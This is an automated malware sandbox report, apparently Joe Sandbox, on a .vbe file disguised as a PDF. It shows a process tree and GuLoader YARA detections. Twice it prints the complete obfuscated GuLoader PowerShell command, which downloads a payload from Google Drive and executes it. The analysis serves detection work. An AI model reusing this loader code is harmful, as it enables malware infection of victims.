                        2024-10-01 05:47:01 UTC1390INData Raw: 36 99 64 21 02 5e a4 a4 0c a8 37 de 04 a5 35 6a d0 40 c9 ae e7 a6 50 f2 1f 78 e8 bc b0 fb 39 bd ba 70 5f 41 5f 45 d2 20 8e 51 3b 5f e1 fd 0c 62 16 50 24 32 fa 34 b8 fc a3 40 c4 18 9e 2c d1 88 fb 36 eb 17 82 2b c5 15 9b e6 6a 69 02 3a 33 47 02 97 66 65 b3 65 b3 ea 08 71 cf b5 94 1e d9 9f 31 cc d0 f4 fa 7a ca 42 69 ab 0b 73 3c 10 3a 3d 88 32 b8 a1 a3 c0 41 3e 11 f8 23 07 5f b5 45 62 77 07 54 bc 9d e8 77 50 64 62 4c d4 78 1a 8b 83 09 1d 2e b8 2a 23 83 10 b5 5d cc 3d 0f d6 a9 32 df ca 55 4e 8a dc 86 c9 52 a3 4e 5c 0d 95 f8 c8 f2 3e e7 77 01 58 14 e4 c5 23 b5 b4 14 fa 66 cb f3 71 9b 94 a6 12 f3 83 8a fd ab 41 21 e8 35 f8 62 38 98 8d 8f 45 6b 5a e5 14 e0 f4 e5 76 6d 30 26 fd a4 e6 4e 8c 1b d4 0e b8 88 87 22 53 29 a9 aa 47 c3 d7 8b bc d2 5e be b1 c2 f0 a0 6e 4e
                        Data Ascii: 6d!^75j@Px9p_A_E Q;_bP$24@,6+ji:3Gfeeq1zBis<:=2A>#_EbwTwPdbLx.*#]=2UNRN\>wX#fqA!5b8EkZvm0&N"S)G^nN


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:01:46:18
                        Start date:01/10/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe"
                        Imagebase:0x7ff70bf60000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:01:46:21
                        Start date:01/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:3
                        Start time:01:46:21
                        Start date:01/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:01:46:32
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfruhindes ' ipho$Hastvg T erLSkrfeoReemeBA oriaPolyml Hand: aarbmFl voiBaadelGladliIndfaeOppusU MoersMillikligniAUnmitd KamfE .elelprisbIBudgegT ryhtPocan=ComfinR sereSlibeW Blot-Tilryo ,orrb Ro ojJa.tfEMeso cDentitClavi Ukldes Vejty SkadsSlagiT ftjeE Van MProgr. ncolnGudsbEStikktOsten.p stpwCroupEDistrbExcu CTa,nilTaxieI FrilE orhaNSk altSweet ');Electroendosmosis ($Gaveled);Electroendosmosis (Jomfruhindes 'Panel$DyrekMRancoiC urclK,nfeiEssayeParatu int sUnderkOverbaTegledP skeeKongelOver.i SkrugBrekrtAdeno.Fr igH uniceHighba OrbidBe tie egrr enits Unca[Excom$GeophAVandsmBiosye apidrForfri bankkStenbaU pilnDevitiOb,ats birdmTerrne Tan n NicosFedt,] ccul= Da b$SecerDVend ig urmnMan.ddenkeleSkov rA ers ');$Slagsidens=Jomfruhindes ',epit$A.titM StudiWi djl iddiSterneCrep,uUnfris S ikk B,agaTrokidKrydse alaclSkrifi jagtgUd mpt S.el.J ggiDDupleoHelbrwVarefn Ov rlBioeloMisalaPa.amdPortuFUnduliblo blK onveLibet(Mygge$LoversCommuacholemOverblTremasjusten Filti yzonnTrykvgCossisIndsm, effi$EclecN Carao Muren Una lluftnemiskupS nktin tvrd lasto DrowpUni ktTextue nerkrSkudsaDimounPrvet)Tamir ';$Nonlepidopteran=$Allende;Electroendosmosis (Jomfruhindes 'Heave$Gleemg oloslA gloo TotabH deraUnmerLObduc:Dir eOJ mfrRSamdeITermig ProgIF oddN KoinaTenenLJa.niIQu.entEdeagiSurfieStrutSCongr=Unnat(DiscotKa,pheDiletSSkoldta,omf-Hy anp Va.aAFede,Tt rdih ell Imple$ha deN L ehoInfinN,ecallBubbie VipppHenreIe,figD DimiOokkulp SirbTSlgtsEekskoR ,eadaHomieNAgari)Sooth ');while (!$originalities) {Electroendosmosis (Jomfruhindes 'Bruge$Klinkg Za,rlAnthoo .seubStok a P lalSetn : DraaALivtavAntioistrygaStricto erpi RocknMandag Smoo=To zl$NoveltA rmar GrunuPopedeP lpe ') ;Electroendosmosis $Slagsidens;Electroendosmosis (Jomfruhindes 'RaffiSVerm,tKrydsaOphrerBrugstBolig- HabaSDistelSmkkyeFrifie GreypStaal Ch ys4Unyok ');Electroendosmosis (Jomfruhindes ' uadr$Untung KattlTyvetoToad,b ampa ennlFrank:grafiobioder unsuiIn exgOpraaiOverlnStadiaAnnitlOversi AlintSaddliU,phyeintersKnowe=Synkr( miniTDetleebemeasHarlet.enth- rankP .olaa Bloct titth,ebin Cohel$DistrN indfoSuggenknolll Ha eeIn enpMtniniFarerdFlugtoForbrpGdnintChikkeMaalerBilfrasurrenBorge)Tidal ') ;Electroendosmosis (Jomfruhindes 'St.nd$ BeatgHeparlL.stooStaphbSmileaKommulDomka:W nklN MycoeFdekdd.apperShalteRrt,svSkaldnPalaneGidse=Immun$Afslug imetlSvinsoNeds,bber na SlaglUnma : Pha M HomoiSkedecAfficr Ta soF,aadsUnreccKvgproSkinfp hoseiIndrecStr gs Neur+,vers+Konom%,erri$DroppTCc.slrBloopa SorgcglanstGermas eat.Xero cVagteo xtrauPraeanbraistEvent ') ;$samlsnings=$Tracts[$Nedrevne];}$Frastdtes=308914;$Tracheloclavicular=31475;Electroendosmosis (Jomfruhindes 'Trsko$forelgRagnelLoa aoBotelbMana,a AgonlGr.in: CornBBiopsuMulchrAma,ri,ugleeR,achr An isSnitm Opdat=Trans unki G Proce .nmetMilen-PukkeC .ofloBaandnB rigtascleeepoxynVejsytMim o Bibli$ EndoNArbejoTilstn,ebutlKi,skeGennepMortiiTownfdRasteorummepSelvmtAnsgneMeetirLaveraSku ln ook ');Electroendosmosis (Jomfruhindes ' Blom$ MonogSp ldlTrykaoW keybTr phaJonbylIsod.: lamU orpun nnelisl,nitRupica Gagercard i VikisHot lmUfoeneB cycsTutam Seig = weal Imb u[ SkruS Ke oy Samms,revvt PhaleSie.em Rush. ottlC .meto .iatnPhilav UbeteFir.erHyb itPulvi]Overk:Rejs :E hveFoverorFlyveo.ankkmKimonB JumbaHardwsZink eRadio6Pro.e4ElectSfredstSubver gtesi S ganUnwarg inal(Bor e$ RemaBLoc,lufelt rFremki SacceHorlarD duks mpev) Merc ');Electroendosmosis (Jomfruhindes 'Victr$Ve seg Dinol nthroBlussb Solda Lev l H ni: LocaMUnreqeshe paB ushtTriambStiftaReverlOverclVigan1Dik,e8Osage9 Upfl Pre e=Vanad dragn[IdentSbrnemy syksD bdetBeg,ie AiremMorda.BordeTterrieMa acxTermotNonde.MountEK ttenOtt,mcBy,enoLagerd,cripiUndernSimengEndoc]an st:il.um: HallAbltesSFryseC t anITrau.IStorf.TeateGDiwateStillt A arSNon nt G nrr ,krui TarnnVasocg Egal(J.ywa$ roliUCingunBiweei Kat.t Hylea ,ccir,rianiAfprvs IngmmLresteFinalsI.cor)Analy ');Electroendosmosis (Jomfruhindes 'Sovek$RastegPreimlHjlpeo,crubbPitcha AnthlAsser:SkoleYUnflua BelysH milmWickeaAgorakshurl=Teich$ Re nMDruesep.chya Nyctt Pa,sbB lafaNonpalSaintl N.ri1Plowm8Skili9 ,vis.WhatesSammeusemipbYar tsKillytChiror.urioiCowbonPhysigPansc(Thali$TankaFS gnar S alaTi fosG myttHjlandC,ecktKrybbeFremss Elig,sols $PerilT ModerFreakaKolpoc trafhrecureOverslRegeloR assc,ennel HgtnaEftervPremai Senicsynkou Grufl .gesah,ndlrArou )Normy ');Electroendosmosis $Yasmak;"
                        Imagebase:0xec0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.3038628107.0000000008960000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.3026899970.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.3038911552.000000000B1AF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:01:46:32
                        Start date:01/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:10
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:11
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:13
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:14
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:15
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:16
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:17
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\msiexec.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\syswow64\msiexec.exe"
                        Imagebase:0x590000
                        File size:59'904 bytes
                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:18
                        Start time:01:46:49
                        Start date:01/10/2024
                        Path:C:\Windows\SysWOW64\dxdiag.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\syswow64\dxdiag.exe"
                        Imagebase:0xc60000
                        File size:222'720 bytes
                        MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Has exited:false

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 00007FF848DB994A Relevance: .6, Instructions: 556COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.2253510591.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 54d21165ce21c0370157f2be138cdf63964aa17db7800ab7d2d2596415b2722c
